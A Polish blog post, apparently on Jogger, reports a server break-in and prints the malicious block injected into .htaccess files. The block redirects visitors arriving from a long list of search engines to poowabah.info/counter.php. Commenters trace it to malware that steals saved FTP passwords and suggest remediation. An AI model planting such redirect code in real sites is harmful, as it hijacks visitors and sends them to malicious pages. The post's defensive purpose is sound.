Włam na serwer

Włam na serwer

Serwer w firmie zaliczył włam. Nie wiem jeszcze ani jak ani skąd, ale dopisał do plików htaccess spore przekierowanie do prawdopobonie zainfekowanej witryny.

Robal identyfikuje się sygnaturką #c3284d#

Drogi Joggerze, widział ktoś wcześniej to cholerstwo?

Kod doklejony do .htaccess wygląda jak poniżej:

#c3284d#
# RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*
(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
#RewriteRule ^(.*)$ http://poowabah.info/counter.php [R=301,L]

#/c3284d#

Znalazłem opis tego, co ten robal robi, jest tutaj. Właśnie czyścimy serwer…

  • lolek

    Nie wygląda na włam, typowe malware wykradające hasła zapisane w klientach FTP. Jeśli dane do ssh były inne niż na FTP to chyba nie ma co czyścić na serwerze, poza naprawą zmodyfikowanych plików stron.

  • lolek dobrze gada. Zmiana haseł FTP i trzepanie wszystkich komputerów, które mają dostęp do haseł FTP (także firmy zewnętrzne). A w logach FTP powinny być wskazówki, skąd przyszedł bonus.

  • AlchemyX

    Standardowy wirus (?) który znając hasło FTP podkleja się pod stronę WWW. U nas klienci często to mają i zazwyczaj idzie wp arze z zawirusowanym pecetem, z którego hasło zniknęło.

  • Zmiana haseł do ftp wszystkim userom poszła jako pierwsza rzecz.

    Ciekawe czy home udostępni logi.

    Autor podlinkowanego przeze mnie tekstu wskazuje na proftpd jako winnego luki.

    Hołm ma przywrócić dane sprzed włamania, ktoś inny się tym zajmuje. A szkoda, lubię takie rzeczy.

  • Na hosting, na którym trzymaliśmy ze znajomymi pliki i do którego różne osoby miały dostęp poprzez różne programy także wkradł się szkodnik i zainfekował różne pliki w folderach dopisując swój kod. Jak się potem okazało jeden z użytkowników mających dostęp przez FTP do tego konta miał zarażony komputer z systemem Windows wirusem, który wykradał hasła z programów do transmisji plików. Wykradł hasło z Total Commandera i władował skryptem na serwer swój kod.